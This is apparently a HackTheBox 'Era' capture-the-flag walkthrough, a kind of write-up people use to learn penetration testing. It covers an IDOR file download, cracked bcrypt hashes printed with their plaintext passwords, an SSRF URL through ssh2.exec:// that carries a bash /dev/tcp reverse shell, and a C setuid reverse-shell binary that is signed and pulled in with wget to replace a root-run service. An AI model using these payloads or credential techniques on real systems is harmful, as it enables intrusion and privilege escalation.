HackTheBox Era Walkthrough

Initial Enumeration

• Using the nmap we didnt get something unusual

• Add era.htb in /etc/hosts

Foothold and user.txt

• I didn’t find much in this website so thought about subdomain enumeration

• And found one using ffuf

└─$ ffuf -w /path/to/top100ksubdomain.txt -H  "Host: FUZZ.era.htb" -u http://era.htb -t 200 -fs 154

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://era.htb
 :: Wordlist         : FUZZ: /path/to/top100ksubdomain.txt
 :: Header           : Host: FUZZ.era.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 154
________________________________________________

file                    [Status: 200, Size: 6765, Words: 2608, Lines: 234, Duration: 105ms]
:: Progress: [100000/100000] :: Job [1/1] :: 1886 req/sec :: Duration: [0:00:56] :: Errors: 0 ::

Link to wordlist here

• Add this in file.era.htb in /etc/hosts

• Here i didnt find something so thought trying subdir enumeration

└─$ gobuster dir -u http://file.era.htb/ -w /usr/share/wordlists/dirb/common.txt -t 50 --exclude-length 6765 -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://file.era.htb/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] Exclude Length:          6765
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 162]
/.htaccess            (Status: 403) [Size: 162]
/.hta                 (Status: 403) [Size: 162]
/assets               (Status: 301) [Size: 178] [--> http://file.era.htb/assets/]
/download.php         (Status: 302) [Size: 0] [--> login.php]
/files                (Status: 301) [Size: 178] [--> http://file.era.htb/files/]
/images               (Status: 301) [Size: 178] [--> http://file.era.htb/images/]
/layout.php           (Status: 200) [Size: 0]
/LICENSE              (Status: 200) [Size: 34524]
/login.php            (Status: 200) [Size: 9214]
/logout.php           (Status: 200) [Size: 70]
/manage.php           (Status: 302) [Size: 0] [--> login.php]
/register.php         (Status: 200) [Size: 3205]
/upload.php           (Status: 302) [Size: 0] [--> login.php]
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================

• At register.php i registered a user and then in upload.php in uploaded a file and in id parameter i found a IDOR

• I exploited the id parameter using the burpsuite intruder

• Link to wordlist here

• In these two ids 54 and 150 we got two files

• I extracted the site-backup-30-08-24.zip and found a db called filedb.sqlite and dumped it

└─$ sqlite3 filedb.sqlite 
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE files (
        fileid int NOT NULL PRIMARY KEY,
        filepath varchar(255) NOT NULL,
        fileowner int NOT NULL,
        filedate timestamp NOT NULL
        );
INSERT INTO files VALUES(54,'files/site-backup-30-08-24.zip',1,1725044282);
CREATE TABLE users (
        user_id INTEGER PRIMARY KEY AUTOINCREMENT,
        user_name varchar(255) NOT NULL,
        user_password varchar(255) NOT NULL,
        auto_delete_files_after int NOT NULL
        , security_answer1 varchar(255), security_answer2 varchar(255), security_answer3 varchar(255));
INSERT INTO users VALUES(1,'admin_ef01cab31aa','$2y$10$wDbohsUaezf74d3sMNRPi.o93wDxJqphM2m0VVUp41If6WrYr.QPC',600,'Maria','Oliver','Ottawa');
INSERT INTO users VALUES(2,'eric','$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm',-1,NULL,NULL,NULL);
INSERT INTO users VALUES(3,'veronica','$2y$10$xQmS7JL8UT4B3jAYK7jsNeZ4I.YqaFFnZNA/2GCxLveQ805kuQGOK',-1,NULL,NULL,NULL);
INSERT INTO users VALUES(4,'yuri','$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.',-1,NULL,NULL,NULL);
INSERT INTO users VALUES(5,'john','$2a$10$iccCEz6.5.W2p7CSBOr3ReaOqyNmINMH1LaqeQaL22a1T1V/IddE6',-1,NULL,NULL,NULL);
INSERT INTO users VALUES(6,'ethan','$2a$10$PkV/LAd07ftxVzBHhrpgcOwD3G1omX4Dk2Y56Tv9DpuUV/dh/a1wC',-1,NULL,NULL,NULL);
DELETE FROM sqlite_sequence;
INSERT INTO sqlite_sequence VALUES('users',16);
COMMIT;
sqlite>

• There we got 6 users one admin and 5 regular users , so further we will crack these hashes

eric:$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm
yuri:$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.

• Only two of them we crackable using john and rockyou wordlist

└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])
No password hashes left to crack (see FAQ)

─$ john --show hash.txt                                     
eric:america
yuri:mustang

2 password hashes cracked, 0 left

• Accessed the ftp service as yuri because eric was getting but didn’t got anything

• Then I started reviewing code and in download.php from the site-backup zip we found a vulnerability

• The vulnerability in the PHP code mainly in beta function for admin_ef01cab31aa is Server-Side Request Forgery (SSRF), where the server blindly uses user input (the "format" parameter) to connect to internal resources or execute commands via PHP stream wrappers like ssh2.exec://, without any checks.

• To exploit it we need to login as admin_ef01cab31aa using http://file.era.htb/reset.php functionality as we change the admin security question using the user account we made

• Now login using http://file.era.htb/security_login.php

• To get rce we need to execute this in browser and dont forget to change <YOUR_IP>

http://file.era.htb/download.php?id=54&show=true&format=ssh2.exec://yuri:mustang@127.0.0.1/bash%20-c%20"bash%20-i%20>%26%20%2Fdev%2Ftcp%2F<YOUR_IP>%2F4444%200%3E%261%22;

• In local shell do

nc -lnvp 4444

└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.11.79] 43046
bash: cannot set terminal process group (4983): Inappropriate ioctl for device
bash: no job control in this shell
yuri@era:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
yuri@era:~$ su eric
su eric
Password: america

• We got the shell stabilize it change user to eric and take user.txt

Privilege Escalation and root.txt

• For root i ran linpeas and got this binary called monitor

eric@era:~$ ps aux | grep root 
root        7540  0.0  0.0   2892   968 ?        Ss   05:05   0:00 /bin/sh -c bash -c '/root/initiate_monitoring.sh' >> /opt/AV/periodic-checks/status.log 2>&1
root        7541  0.0  0.0   4784  3412 ?        S    05:05   0:00 /bin/bash /root/initiate_monitoring.sh
root        7551  0.0  0.0   2776   964 ?        S    05:05   0:00 /opt/AV/periodic-checks/monitor

• This monitor binary run in background as root

• To exploit this we need to make a malicious executable and upload it but we need to sign it too using the key we got in signing.zip

• In your local machine do make a file exploit.c

└─$ cat exploit.c         
#include <unistd.h>
int main() {
    setuid(0); setgid(0);
    execl("/bin/bash", "bash", "-c", "bash -i >& /dev/tcp/<YOUR_IP>/1337 0>&1", NULL);
    return 0;
}
└─$ x86_64-linux-gnu-gcc -o monitor exploit.c -static

└─$ file monitor    
monitor: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=5aee64d06999616a92857d433be5d85a5af4a5e5, for GNU/Linux 3.2.0, not stripped

• To sign this we need to

git clone https://github.com/NUAA-WatchDog/linux-elf-binary-signer.git
cd linux-elf-binary-signer
make clean
gcc -o elf-sign elf_sign.c -lssl -lcrypto -Wno-deprecated-declarations

└─$ ./elf-sign sha256 key.pem key.pem monitor
 --- 64-bit ELF file, version 1 (CURRENT), little endian.
 --- 26 sections detected.
 --- Section 0006 [.text] detected.
 --- Length of section [.text]: 480697
 --- Signature size of [.text]: 458
 --- Writing signature to file: .text_sig
 --- Removing temporary signature file: .text_sig
─$ mv monitor monitor.1

• Now run a python server upload this into this directory /opt/AV/periodic-checks

• To make this exploitable to do this in eric shell

wget http://<YOUR_IP>:8000/monitor.1
rm monitor
mv monitor.1 monitor
chmod +x monitor

• And in local machine

nc -lnvp 1337

└─$ nc -lnvp 1337                 
listening on [any] 1337 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.11.79] 55440
bash: cannot set terminal process group (8204): Inappropriate ioctl for device
bash: no job control in this shell
root@era:~#

This is it for the machine. Hope you enjoyed solving it

Thanks for reading the walkthrough. Hope you like it ! Do leave a comment for feedback or queries !!